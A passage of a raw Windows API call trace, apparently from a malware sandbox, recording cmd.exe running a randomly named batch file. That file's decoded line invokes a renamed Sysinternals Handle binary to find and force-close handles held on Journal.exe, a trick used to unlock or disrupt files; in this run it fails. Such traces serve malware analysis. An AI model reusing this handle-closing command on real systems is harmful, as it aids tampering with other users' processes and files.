[0284.926] FindClose (in: hFindFile=0xd1ca58 | out: hFindFile=0xd1ca58) returned 1 [0284.927] _wcsicmp (_String1="cd", _String2=")") returned 58 [0284.927] _wcsicmp (_String1="FOR", _String2="cd") returned 3 [0284.927] _wcsicmp (_String1="FOR/?", _String2="cd") returned 3 [0284.927] _wcsicmp (_String1="IF", _String2="cd") returned 6 [0284.927] _wcsicmp (_String1="IF/?", _String2="cd") returned 6 [0284.927] _wcsicmp (_String1="REM", _String2="cd") returned 15 [0284.927] _wcsicmp (_String1="REM/?", _String2="cd") returned 15 [0284.927] _tell (_FileHandle=3) returned 78 [0284.927] _close (_FileHandle=3) returned 0 [0284.927] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xbbef98 | out: _Buffer="\r\n") returned 2 [0284.927] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.927] GetFileType (hFile=0x3c) returned 0x2 [0284.927] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0284.927] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbef70 | out: lpMode=0xbbef70) returned 1 [0284.957] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.957] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xbbef88, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xbbef88*=0x2) returned 1 [0284.964] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0284.964] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0284.964] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xbbef94 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0284.965] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xbbef94 | out: _Buffer=">") returned 1 [0284.965] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.965] GetFileType (hFile=0x3c) returned 0x2 [0284.965] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0284.965] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbef74 | out: lpMode=0xbbef74) returned 1 [0284.978] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.978] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xbbef8c, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xbbef8c*=0x1e) returned 1 [0284.987] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.987] GetFileType (hFile=0x3c) returned 0x2 [0284.987] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0284.987] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbf214 | out: lpMode=0xbbf214) returned 1 [0284.989] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.989] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xd282a0*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xbbf22c, lpReserved=0x0 | out: lpBuffer=0xd282a0*, lpNumberOfCharsWritten=0xbbf22c*=0x2) returned 1 [0284.992] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xbbf234 | out: _Buffer=" /d \"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\\" ") returned 37 [0284.992] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.992] GetFileType (hFile=0x3c) returned 0x2 [0284.992] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0284.992] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbf20c | out: lpMode=0xbbf20c) returned 1 [0285.270] _get_osfhandle (_FileHandle=1) returned 0x3c [0285.270] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x25, lpNumberOfCharsWritten=0xbbf224, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xbbf224*=0x25) returned 1 [0285.615] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xbbf248 | out: _Buffer="\r\n") returned 2 [0285.615] _get_osfhandle (_FileHandle=1) returned 0x3c [0285.615] GetFileType (hFile=0x3c) returned 0x2 [0285.615] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0285.615] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbf220 | out: lpMode=0xbbf220) returned 1 [0286.316] _get_osfhandle (_FileHandle=1) returned 0x3c [0286.316] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xbbf238, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xbbf238*=0x2) returned 1 [0286.626] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0286.626] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0286.626] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0286.626] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0286.626] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0286.626] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0286.626] GetConsoleTitleW (in: lpConsoleTitle=0xbbedb8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0287.022] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0287.022] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0287.039] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0287.039] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0287.039] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0287.039] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0287.039] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0287.039] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0287.039] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xbbeb70, nVolumeNameSize=0x104, lpVolumeSerialNumber=0xbbeb68, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xbbeb68*=0xd2ca4def, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0287.040] _wcsnicmp (_String1="/d", _String2="/D", _MaxCount=0x2) returned 0 [0287.040] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xbbe914 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0287.040] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", nBufferLength=0x104, lpBuffer=0xbbe914, lpFilePart=0xbbe90c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpFilePart=0xbbe90c*=0x0) returned 0x1e [0287.040] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0287.040] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xbbe690 | out: lpFindFileData=0xbbe690) returned 0xd1fa78 [0287.040] FindClose (in: hFindFile=0xd1fa78 | out: hFindFile=0xd1fa78) returned 1 [0287.040] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0xbbe690 | out: lpFindFileData=0xbbe690) returned 0xd1fa78 [0287.040] FindClose (in: hFindFile=0xd1fa78 | out: hFindFile=0xd1fa78) returned 1 [0287.040] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0287.040] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0xbbe690 | out: lpFindFileData=0xbbe690) returned 0xd1fa78 [0287.040] FindClose (in: hFindFile=0xd1fa78 | out: hFindFile=0xd1fa78) returned 1 [0287.040] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0287.040] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0287.040] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0287.040] GetEnvironmentStringsW () returned 0xd1b2e8* [0287.040] FreeEnvironmentStringsA (penv="=") returned 1 [0287.041] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0287.041] _get_osfhandle (_FileHandle=1) returned 0x3c [0287.041] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0287.777] _get_osfhandle (_FileHandle=1) returned 0x3c [0287.777] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0288.014] _get_osfhandle (_FileHandle=0) returned 0x38 [0288.014] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0288.543] SetConsoleInputExeNameW () returned 0x1 [0288.543] GetConsoleOutputCP () returned 0x1b5 [0288.934] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0288.934] SetThreadUILanguage (LangId=0x0) returned 0x409 [0289.887] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xbbf204, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0289.888] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0289.888] _get_osfhandle (_FileHandle=3) returned 0xb0 [0289.888] SetFilePointer (in: hFile=0xb0, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0289.888] _get_osfhandle (_FileHandle=3) returned 0xb0 [0289.888] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0289.888] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xbbf1d4, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xbbf1d4*=0x94, lpOverlapped=0x0) returned 1 [0289.889] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=148, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="FOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`vIDhS3md.exe -accepteula %FN% -nobanner`) DO (vIDhS3md.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n") returned 148 [0289.889] _get_osfhandle (_FileHandle=3) returned 0xb0 [0289.889] GetFileType (hFile=0xb0) returned 0x1 [0289.889] _get_osfhandle (_FileHandle=3) returned 0xb0 [0289.889] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0289.889] GetEnvironmentVariableW (in: lpName="FN", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="\"Journal.exe\"") returned 0xd [0289.890] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0289.890] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0289.890] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0289.890] _wcsicmp (_String1="/L", _String2="/F") returned 6 [0289.890] _wcsicmp (_String1="/D", _String2="/F") returned -2 [0289.890] _wcsicmp (_String1="/F", _String2="/F") returned 0 [0289.890] _wcsicmp (_String1="/L", _String2="%I") returned 10 [0289.890] _wcsicmp (_String1="/D", _String2="%I") returned 10 [0289.890] _wcsicmp (_String1="/F", _String2="%I") returned 10 [0289.890] _wcsicmp (_String1="/R", _String2="%I") returned 10 [0289.890] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0289.891] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0289.891] _wcsicmp (_String1="FOR", _String2="vIDhS3md.exe") returned -16 [0289.891] _wcsicmp (_String1="FOR/?", _String2="vIDhS3md.exe") returned -16 [0289.891] _wcsicmp (_String1="IF", _String2="vIDhS3md.exe") returned -13 [0289.891] _wcsicmp (_String1="IF/?", _String2="vIDhS3md.exe") returned -13 [0289.891] _wcsicmp (_String1="REM", _String2="vIDhS3md.exe") returned -4 [0289.891] _wcsicmp (_String1="REM/?", _String2="vIDhS3md.exe") returned -4 [0289.892] _tell (_FileHandle=3) returned 226 [0289.892] _close (_FileHandle=3) returned 0 [0289.893] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xbbef98 | out: _Buffer="\r\n") returned 2 [0289.893] _get_osfhandle (_FileHandle=1) returned 0x3c [0289.893] GetFileType (hFile=0x3c) returned 0x2 [0289.893] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0289.893] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbef70 | out: lpMode=0xbbef70) returned 1 [0290.239] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.239] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xbbef88, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xbbef88*=0x2) returned 1 [0290.340] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0290.340] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0290.340] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xbbef94 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0290.340] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xbbef94 | out: _Buffer=">") returned 1 [0290.340] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.340] GetFileType (hFile=0x3c) returned 0x2 [0290.340] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0290.340] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbef74 | out: lpMode=0xbbef74) returned 1 [0290.383] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.383] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xbbef8c, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xbbef8c*=0x1e) returned 1 [0290.610] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xbbf234 | out: _Buffer="FOR") returned 3 [0290.610] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.610] GetFileType (hFile=0x3c) returned 0x2 [0290.610] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0290.610] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbf20c | out: lpMode=0xbbf20c) returned 1 [0290.640] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.640] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xbbf224, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xbbf224*=0x3) returned 1 [0290.656] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format=" %s", _ArgList=0xbbf234 | out: _Buffer=" /F") returned 3 [0290.656] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.656] GetFileType (hFile=0x3c) returned 0x2 [0290.656] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0290.656] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbf20c | out: lpMode=0xbbf20c) returned 1 [0290.775] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.775] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xbbf224, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xbbf224*=0x3) returned 1 [0290.932] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format=" %s", _ArgList=0xbbf234 | out: _Buffer=" \"UseBackQ Tokens=3,6 delims=: \"") returned 32 [0290.932] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.932] GetFileType (hFile=0x3c) returned 0x2 [0290.932] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0290.932] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbf20c | out: lpMode=0xbbf20c) returned 1 [0290.984] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.984] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0xbbf224, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xbbf224*=0x20) returned 1 [0291.271] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xbbf234 | out: _Buffer=" %I IN ") returned 7 [0291.271] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.271] GetFileType (hFile=0x3c) returned 0x2 [0291.271] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0291.271] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbf20c | out: lpMode=0xbbf20c) returned 1 [0291.373] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.373] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xbbf224, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xbbf224*=0x7) returned 1 [0291.800] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xbbf230 | out: _Buffer="(`vIDhS3md.exe -accepteula \"Journal.exe\" -nobanner`) DO ") returned 56 [0291.800] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.800] GetFileType (hFile=0x3c) returned 0x2 [0291.800] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0291.800] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbf208 | out: lpMode=0xbbf208) returned 1 [0292.215] _get_osfhandle (_FileHandle=1) returned 0x3c [0292.215] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x38, lpNumberOfCharsWritten=0xbbf220, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xbbf220*=0x38) returned 1 [0292.845] _get_osfhandle (_FileHandle=1) returned 0x3c [0292.845] GetFileType (hFile=0x3c) returned 0x2 [0292.845] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0292.845] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbf214 | out: lpMode=0xbbf214) returned 1 [0293.015] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.015] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13d2318*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xbbf22c, lpReserved=0x0 | out: lpBuffer=0x13d2318*, lpNumberOfCharsWritten=0xbbf22c*=0x1) returned 1 [0293.179] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.179] GetFileType (hFile=0x3c) returned 0x2 [0293.179] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0293.179] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbf204 | out: lpMode=0xbbf204) returned 1 [0293.279] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.279] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xd10b40*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0xbbf21c, lpReserved=0x0 | out: lpBuffer=0xd10b40*, lpNumberOfCharsWritten=0xbbf21c*=0xc) returned 1 [0293.537] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xbbf224 | out: _Buffer=" -accepteula -c %J -y -p %I -nobanner ") returned 38 [0293.538] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.538] GetFileType (hFile=0x3c) returned 0x2 [0293.538] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0293.538] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbf1fc | out: lpMode=0xbbf1fc) returned 1 [0293.808] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.808] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0xbbf214, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xbbf214*=0x26) returned 1 [0294.276] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xbbf234 | out: _Buffer=") ") returned 2 [0294.276] _get_osfhandle (_FileHandle=1) returned 0x3c [0294.276] GetFileType (hFile=0x3c) returned 0x2 [0294.276] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0294.276] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbf20c | out: lpMode=0xbbf20c) returned 1 [0295.062] _get_osfhandle (_FileHandle=1) returned 0x3c [0295.062] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xbbf224, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xbbf224*=0x2) returned 1 [0295.617] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xbbf248 | out: _Buffer="\r\n") returned 2 [0295.617] _get_osfhandle (_FileHandle=1) returned 0x3c [0295.617] GetFileType (hFile=0x3c) returned 0x2 [0295.617] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0295.617] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbf220 | out: lpMode=0xbbf220) returned 1 [0296.012] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.012] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xbbf238, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xbbf238*=0x2) returned 1 [0296.133] _wcsnicmp (_String1="UseBackQ", _String2="usebackq", _MaxCount=0x8) returned 0 [0296.133] _wcsnicmp (_String1="Tokens=3", _String2="usebackq", _MaxCount=0x8) returned -1 [0296.133] _wcsnicmp (_String1="Tokens=", _String2="useback", _MaxCount=0x7) returned -1 [0296.133] _wcsnicmp (_String1="Toke", _String2="eol=", _MaxCount=0x4) returned 15 [0296.133] _wcsnicmp (_String1="Tokens=", _String2="delims=", _MaxCount=0x7) returned 16 [0296.133] _wcsnicmp (_String1="Token", _String2="skip=", _MaxCount=0x5) returned 1 [0296.133] _wcsnicmp (_String1="Tokens=", _String2="tokens=", _MaxCount=0x7) returned 0 [0296.133] wcstol (in: _String="3,6 delims=: \"", _EndPtr=0xbbf170, _Radix=0 | out: _EndPtr=0xbbf170*=",6 delims=: \"") returned 3 [0296.133] wcstol (in: _String="6 delims=: \"", _EndPtr=0xbbf170, _Radix=0 | out: _EndPtr=0xbbf170*=" delims=: \"") returned 6 [0296.133] _wcsnicmp (_String1="delims=:", _String2="usebackq", _MaxCount=0x8) returned -17 [0296.133] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0296.133] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0296.133] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0296.134] _wpopen (_Command="vIDhS3md.exe -accepteula \"Journal.exe\" -nobanner", _Mode="rb") returned 0x77981268 [0296.145] feof (_File=0x77981268) returned 0 [0296.145] ferror (_File=0x77981268) returned 0 [0296.145] fgets (in: _Buf=0xd1a5e8, _MaxCount=256, _File=0x77981268 | out: _Buf="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n", _File=0x77981268) returned="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n" [0299.256] feof (_File=0x77981268) returned 0 [0299.256] ferror (_File=0x77981268) returned 0 [0299.256] fgets (in: _Buf=0xd1a62e, _MaxCount=442, _File=0x77981268 | out: _Buf="\r\r\n", _File=0x77981268) returned="\r\r\n" [0299.256] feof (_File=0x77981268) returned 0 [0299.256] ferror (_File=0x77981268) returned 0 [0299.256] fgets (in: _Buf=0xd1f9c9, _MaxCount=695, _File=0x77981268 | out: _Buf="", _File=0x77981268) returned 0x0 [0299.974] _pclose (in: _File=0x77981268 | out: _File=0x77981268) returned 1 [0299.975] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xd1f9c9, cbMultiByte=73, lpWideCharStr=0xd1f980, cchWideChar=73 | out: lpWideCharStr="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n\r\r\n") returned 73 [0299.976] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xbbee50 | out: _Buffer="\r\n") returned 2 [0299.976] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.976] GetFileType (hFile=0x3c) returned 0x2 [0299.976] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0299.976] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbee28 | out: lpMode=0xbbee28) returned 1 [0299.995] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.995] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xbbee40, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xbbee40*=0x2) returned 1 [0299.998] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0299.998] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xbbee4c | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0299.998] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xbbee4c | out: _Buffer=">") returned 1 [0299.998] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.998] GetFileType (hFile=0x3c) returned 0x2 [0299.998] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0299.998] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbee2c | out: lpMode=0xbbee2c) returned 1 [0299.999] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.999] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xbbee44, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xbbee44*=0x1e) returned 1 [0299.999] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.999] GetFileType (hFile=0x3c) returned 0x2 [0299.999] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0299.999] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbf0cc | out: lpMode=0xbbf0cc) returned 1 [0299.999] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.999] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13d2318*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xbbf0e4, lpReserved=0x0 | out: lpBuffer=0x13d2318*, lpNumberOfCharsWritten=0xbbf0e4*=0x1) returned 1 [0299.999] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.999] GetFileType (hFile=0x3c) returned 0x2 [0299.999] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0299.999] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbf0bc | out: lpMode=0xbbf0bc) returned 1 